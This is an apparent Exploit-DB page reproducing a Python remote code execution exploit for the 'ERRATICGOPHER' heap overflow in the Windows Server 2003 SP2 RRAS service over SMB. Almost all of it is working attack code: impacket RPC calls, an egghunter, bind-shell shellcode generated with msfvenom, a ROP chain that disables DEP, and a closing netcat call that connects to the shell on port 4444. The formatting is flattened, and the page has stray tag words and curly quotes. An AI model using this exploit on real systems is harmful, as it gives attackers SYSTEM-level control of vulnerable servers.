Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution

標籤：portal   library   actor   rect   over   plugins   bind   eps   targe   

EDB-ID: 41929	Author: vportal	Published: 2017-04-25
CVE: N/A	Type: Remote	Platform: Windows
Aliases: ERRATICGOPHER	Advisory/Source: N/A	Tags: N/A
E-DB Verified:	Exploit:  Download /  View Raw	Vulnerable App: N/A

#!/usr/bin/env python# -*- coding: utf-8 -*-###################################################################################   By Victor Portal (vportal) for educational porpouse only     ###################################################################################   This exploit is the python version of the ErraticGopher exploit probably     ##   with some modifications. ErraticGopher exploits a memory corruption          ##   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       ##   Because the Magic bytes, the application redirects the execution to the      ##   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        ##   all te injected stub from the heap to the stack, overwritten a return        ##   address as well as the SEH handler stored in the Stack, being possible       # #   to control the execution flow to disable DEP and jump to the shellcode       ##   as SYSTEM user.                                                              ####################################################################################The exploit only works if target has the RRAS service enabled#Tested on Windows Server 2003 SP2 import structimport sysimport timeimport os from threading import Thread                                     from impacket import smbfrom impacket import uuidfrom impacket import dcerpcfrom impacket.dcerpc.v5 import transport                  target = sys.argv[1] print ‘[-]Initiating connection‘trans = transport.DCERPCTransportFactory(‘ncacn_np:%s[\\pipe\\browser]‘ % target)trans.connect() print ‘[-]connected to ncacn_np:%s[\\pipe\\browser]‘ % targetdce = trans.DCERPC_class(trans)#RRAS DCE-RPC CALLdce.bind(uuid.uuidtup_to_bin((‘8f09f000-b7ed-11ce-bbd2-00001a181cad‘, ‘0.0‘))) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f pythonbuf =  ""buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"buf += "\xc4\x25\x3d\xe9" #NX disable routine for Windows Server 2003 SP2rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dllrop += "\x45"*16rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dllrop += "\x5d\x7a\x81\x7c" #ret 20rop += "\x71\x42\x38\x77" #jmp esprop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dllrop += "\x90"*2 + egghunter + "\x90"*42rop += "\x17\xf5\x83\x7c" #Disable NX routinerop += "\x90"*4 stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytesstub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))stub += "\x12" #Magic bytestub += "\x46"*522stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes  dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)print "[-]Exploit sent to target successfully..." print "Waiting for shell..."time.sleep(5)os.system("nc " + target + " 4444")

　　

Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution